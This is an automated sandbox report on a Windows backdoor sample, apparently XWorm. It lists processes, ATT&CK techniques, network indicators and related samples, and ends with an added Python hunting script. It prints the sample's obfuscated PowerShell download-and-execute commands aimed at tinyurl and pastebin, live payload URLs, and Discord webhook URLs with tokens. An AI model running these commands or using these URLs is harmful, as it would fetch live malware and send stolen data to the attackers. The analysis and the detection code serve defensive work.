Source: C:\Users\user\Desktop\vF20HtY4a4.exe Memory allocated: 1FD1E490000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6481
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1588
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4372
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1263
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 431
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3926
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468 Thread sleep count: 1588 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052 Thread sleep count: 209 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964 Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5064 Thread sleep count: 4372 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888 Thread sleep count: 5411 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552 Thread sleep count: 1263 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5164 Thread sleep count: 191 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6040 Thread sleep count: 431 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 3926 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5976 Thread sleep count: 5815 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1656 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000E.00000002.2119610367.00000210EA8FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: powershell.exe, 00000009.00000002.2015256142.000001FD296FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\vF20HtY4a4.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\vF20HtY4a4.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exe Queries volume information: C:\Users\user\Desktop\vF20HtY4a4.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Mitre Att&ck Matrix

Techniques are listed per tactic column. A number before a technique name is the count badge shown for it in the original matrix; techniques without a number are the matrix's unmatched placeholders.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: 1 Spearphishing Link; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 111 Windows Management Instrumentation; 2 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 111 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID 1534114; sample vF20HtY4a4.exe; start date 15/10/2024; architecture WINDOWS; score 92)

Start node: resolves pastebin.com, tinyurl.com and 2 other IPs or domains. Signatures on the start node: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 2 other signatures. On pastebin.com: Connects to a pastebin service (likely for C&C).

Process tree (node numbers are the graph's):
  vF20HtY4a4.exe (8)  [Suspicious powershell command line found]
    powershell.exe (15)
      network: raw.githubusercontent.com 185.199.110.133:443 (local ports 49705, 49711), FASTLYUS, Netherlands; tinyurl.com 104.18.111.161:80 (local port 49704), CLOUDFLARENETUS, United States; discord.com 162.159.136.232:443 (local ports 49713, 49718), CLOUDFLARENETUS, United States
      dropped: C:\ProgramData\...\BeginSync.lnk (MS)
      signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Tries to open files direct via NTFS file id; Powershell creates an autostart link
      conhost.exe (30)
      attrib.exe (32)
    conhost.exe (20)
  forfiles.exe (11)
    powershell.exe (22)
      powershell.exe (34)
        network: pastebin.com 104.20.4.235:443 (local ports 49709, 49710), CLOUDFLARENETUS, United States
    conhost.exe (24)
  forfiles.exe (13)
    powershell.exe (26)
      powershell.exe (37)
    conhost.exe (28)

Antivirus detection (submitted file)
Source | Detection | Scanner | Label
vF20HtY4a4.exe | 34% | ReversingLabs | Win64.Backdoor.Xworm
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL reputation
Source | Detection | Scanner | Label
https://go.micro | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus detection | Reputation
tinyurl.com | 104.18.111.161 | true | true | (none) | unknown
discord.com | 162.159.136.232 | true | true | (none) | unknown
raw.githubusercontent.com | 185.199.110.133 | true | true | (none) | unknown
pastebin.com | 104.20.4.235 | true | true | (none) | unknown
Contacted URLs
Name | Malicious | Antivirus detection | Reputation
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | (none) | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | (none) | unknown
https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI | true | (none) | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt | false | (none) | unknown
http://pastebin.com/raw/sA04Mwk2 | false | (none) | unknown
https://pastebin.com/raw/sA04Mwk2 | false | (none) | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | (none) | unknown
http://tinyurl.com/bdhpvpny | false | (none) | unknown
URLs found in memory or binary data
Name | Source (process, memory dump) | Malicious | Antivirus detection | Reputation
https://discord.com | powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmp | true | (none) | unknown
https://discord.com/api/webhooks/128545359042878 | powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmp | true | (none) | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080A92000.00000004.00000800.00020000.00000000.sdmp | true | (none) | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 00000009.00000002.2001538441.000001FD11F57000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmp | true | (none) | unknown
https://raw.githubusercontent.com | powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmp | true | (none) | unknown
https://go.micro | powershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://discord.com | powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.2001538441.000001FD1141B000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2001538441.000001FD11430000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.000002108005E000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080025000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.2001538441.000001FD11457000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080085000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pastebin.com | powershell.exe, 00000009.00000002.2001538441.000001FD11E26000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2001538441.000001FD11E42000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080A5A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080A74000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
https://pastebin.com | powershell.exe, 00000009.00000002.2001538441.000001FD11E32000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000E.00000002.2082988609.0000021080A64000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN name | Malicious
162.159.136.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
104.18.111.161 | tinyurl.com | United States | 13335 | CLOUDFLARENETUS | true
185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1534114
                                            Start date and time:2024-10-15 16:06:56 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 5m 27s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:vF20HtY4a4.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332.exe
                                            Detection:MAL
                                            Classification:mal92.troj.evad.winEXE@19/14@4/4
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 71%
                                            • Number of executed functions: 7
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target vF20HtY4a4.exe, PID 6032 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: vF20HtY4a4.exe
Time | Type | Description
10:07:58 | API Interceptor | 378x Sleep call for process: powershell.exe modified
16:08:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
16:08:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
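The Run-key rows above, the forfiles.exe -> powershell.exe chains in the behavior graph and the paste/webhook/shortener URLs in the network tables translate directly into hunting logic. The Python below is an added example and is not part of the Joe Sandbox report: it runs three checks over constructed sample telemetry modelled on the report's rows (a Run value whose data is a .lnk under C:\ProgramData, forfiles.exe spawning powershell.exe, and powershell.exe requesting the hosts the sample used). The event shapes, the WATCHED_HOSTS list and every sample record are assumptions for illustration; the webhook token in the sample data is replaced by REDACTED. Two caveats a practitioner should keep: raw.githubusercontent.com and tinyurl.com see plenty of legitimate use, so a hit there is a triage lead to correlate with the process chain rather than a verdict; and the value name "OneDrive File Sync" imitates OneDrive, whose standard per-user autostart launches OneDrive.exe from %LOCALAPPDATA%, not a shortcut, which is why the .lnk check does not fire on the benign control record included below.

```python
"""
Hunting checks for the behaviour this report records, run over constructed
sample telemetry (not real logs).  Added example; not part of the Joe Sandbox
report.  All event shapes and sample records are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Sequence, Tuple
from urllib.parse import urlsplit

# 1. Autostart: a Run value whose data is a .lnk (Run values normally launch an
#    executable), as in the report's "OneDrive File Sync" -> BeginSync.lnk entry.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.IGNORECASE)
# Optional quotes, a path ending in .lnk, then end of data or whitespace (so foo.lnk.exe is not a hit).
LNK_RE = re.compile(r'^"?(?P<path>[^"]+?\.lnk)"?(?:\s|$)', re.IGNORECASE)


def suspicious_run_value(key: str, name: str, data: str) -> Optional[str]:
    """Reason string when a Run value launches a shortcut, else None."""
    if not RUN_KEY_RE.search(key):
        return None
    m = LNK_RE.match(data.strip())
    if not m:
        return None
    path = m.group("path")
    flag = " (under ProgramData)" if path.lower().startswith("c:\\programdata\\") else ""
    return f"Run value {name!r} launches a .lnk{flag}: {path}"


# 2. Process lineage: forfiles.exe spawning powershell.exe (graph edges 11->22 and 13->26).
@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_chain(ev: ProcessEvent) -> Optional[str]:
    if _basename(ev.parent_image) == "forfiles.exe" and _basename(ev.image) == "powershell.exe":
        return f"pid {ev.pid}: forfiles.exe spawned powershell.exe ({ev.command_line})"
    return None


# 3. PowerShell reaching the hosts the sample used for staging and C2.
#    (host, path prefix) pairs taken from the report's URL tables; assumed watch list.
WATCHED_HOSTS: Sequence[Tuple[str, str]] = (
    ("discord.com", "/api/webhooks/"),
    ("pastebin.com", "/raw/"),
    ("raw.githubusercontent.com", "/"),
    ("tinyurl.com", "/"),
)


def suspicious_url(process_image: str, url: str) -> Optional[str]:
    if _basename(process_image) != "powershell.exe":
        return None
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    for watched_host, prefix in WATCHED_HOSTS:
        if host == watched_host and parts.path.startswith(prefix):
            return f"powershell.exe requested {host}{parts.path}"
    return None


def hunt(run_values: Iterable[Tuple[str, str, str]],
         processes: Iterable[ProcessEvent],
         urls: Iterable[Tuple[str, str]]) -> List[str]:
    """Run all three checks and return the findings as plain strings."""
    findings: List[str] = []
    findings += [r for r in (suspicious_run_value(*v) for v in run_values) if r]
    findings += [r for r in map(suspicious_chain, processes) if r]
    findings += [r for r in (suspicious_url(p, u) for p, u in urls) if r]
    return findings


# Constructed sample telemetry modelled on the report's rows, plus benign controls.
SAMPLE_RUN_VALUES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive File Sync",
     r'"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",   # benign control
     r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESSES = [
    ProcessEvent(22, PS, r"C:\Windows\System32\forfiles.exe", "powershell.exe"),
    ProcessEvent(99, PS, r"C:\Windows\explorer.exe", "powershell.exe"),   # benign control
]
SAMPLE_URLS = [
    (PS, "https://pastebin.com/raw/sA04Mwk2"),
    (PS, "http://tinyurl.com/bdhpvpny"),
    (PS, "https://discord.com/api/webhooks/1295171900019966004/REDACTED"),
    (PS, "https://aka.ms/pscore68"),                              # benign PowerShell telemetry URL
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",   # not powershell: ignored
     "https://discord.com/api/webhooks/1/x"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_RUN_VALUES, SAMPLE_PROCESSES, SAMPLE_URLS):
        print(finding)
```

Against the sample records the run yields five findings: the BeginSync.lnk autostart, the pid 22 lineage, and the three PowerShell requests to pastebin.com, tinyurl.com and the Discord webhook path; the OneDrive control, the explorer-launched PowerShell, the aka.ms request and the Chrome request all stay silent. Feed the same three functions from Sysmon event ID 13 (registry value set), event ID 1 (process create) and proxy or DNS logs to run the checks over real telemetry.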
Context: contacted IPs seen in other analyses (SHA-256 and report links were not preserved in this extraction)
Match | Associated sample name / URL | Detection | Threat name | Context

162.159.136.232
  S23UhdW5DH.exe | malicious | LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc | discord.com/administrator/index.php

104.20.4.235
  OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  gaber.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
  sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
  sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
  envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
  New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
  Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
  Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
  Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
  (gaber.ps1 and cr_asm_crypter.ps1 share the paste sA04Mwk2 that this sample retrieves, and their names match the gaber.txt and cr_asm_crypter.txt files in this sample's raw.githubusercontent.com URLs.)

104.18.111.161
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | tinyurl.com/muewsc78
  5UIy3bo46y.dll | malicious | Unknown | tinyurl.com/yeykydun
  BeginSync lnk.lnk | malicious | Unknown | tinyurl.com/yeykydun
  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | tinyurl.com/yk3s8ubp
Context: contacted domains seen in other analyses
Match | Associated sample name / URL | Detection | Threat name | Context (IP)

tinyurl.com
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 104.18.111.161
  5UIy3bo46y.dll | malicious | Unknown | 104.18.111.161
  HQsitBLlOv.dll | malicious | Unknown | 104.17.112.233
  BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
  https://tinyurl.com/y9r5fvas | malicious | Unknown | 104.17.112.233
  https://tinyurl.com/5xa2ubd7 | malicious | Unknown | 104.17.112.233
  SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
  SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 104.17.112.233
  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | 104.18.111.161
  balcao242609.vbs | malicious | Unknown | 104.18.111.161

pastebin.com
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 172.67.19.24
  OSLdZanXNc.exe | malicious | Unknown | 104.20.3.235
  5UIy3bo46y.dll | malicious | Unknown | 104.20.3.235
  HQsitBLlOv.dll | malicious | Unknown | 104.20.4.235
  xK44OOt7vD.exe | malicious | Unknown | 172.67.19.24
  steamcodegenerator.exe | malicious | Unknown | 172.67.19.24
  Lm9IJ4r9oO.exe | malicious | Unknown | 104.20.3.235
  gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
  cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
  OSLdZanXNc.exe | malicious | Unknown | 104.20.4.235

discord.com
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 162.159.138.232
  OSLdZanXNc.exe | malicious | Unknown | 162.159.137.232
  5UIy3bo46y.dll | malicious | Unknown | 162.159.128.233
  HQsitBLlOv.dll | malicious | Unknown | 162.159.136.232
  xK44OOt7vD.exe | malicious | Unknown | 162.159.138.232
  steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
  Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
  cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232
  OSLdZanXNc.exe | malicious | Unknown | 162.159.138.232
  BeginSync lnk.lnk | malicious | Unknown | 162.159.137.232

raw.githubusercontent.com
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 185.199.108.133
  OSLdZanXNc.exe | malicious | Unknown | 185.199.108.133
  5UIy3bo46y.dll | malicious | Unknown | 185.199.109.133
  HQsitBLlOv.dll | malicious | Unknown | 185.199.109.133
  xK44OOt7vD.exe | malicious | Unknown | 185.199.110.133
  steamcodegenerator.exe | malicious | Unknown | 185.199.109.133
  Lm9IJ4r9oO.exe | malicious | Unknown | 185.199.111.133
  cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 185.199.111.133
  OSLdZanXNc.exe | malicious | Unknown | 185.199.109.133
  BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
Context: ASNs seen in other analyses (the CLOUDFLARENETUS list appears three times in the original report, once per Cloudflare-hosted contacted IP, with identical content; it is shown once here)
Match | Associated sample name / URL | Detection | Threat name | Context (IP)

CLOUDFLARENETUS
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 104.18.111.161
  https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_email | malicious | HTMLPhisher | 104.17.25.14
  OSLdZanXNc.exe | malicious | Unknown | 162.159.137.232
  5UIy3bo46y.dll | malicious | Unknown | 162.159.128.233
  HQsitBLlOv.dll | malicious | Unknown | 104.17.112.233
  xK44OOt7vD.exe | malicious | Unknown | 172.67.19.24
  steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
  Lm9IJ4r9oO.exe | malicious | Unknown | 162.159.138.232
  gaber_pyld.ps1 | malicious | AsyncRAT, XWorm | 172.67.19.24
  cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | 162.159.138.232

FASTLYUS
  VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 185.199.108.133
  https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_email | malicious | HTMLPhisher | 151.101.2.137
  OSLdZanXNc.exe | malicious | Unknown | 185.199.108.133
  5UIy3bo46y.dll | malicious | Unknown | 185.199.109.133
  HQsitBLlOv.dll | malicious | Unknown | 185.199.109.133
  xK44OOt7vD.exe | malicious | Unknown | 185.199.110.133
  steamcodegenerator.exe | malicious | Unknown | 185.199.109.133
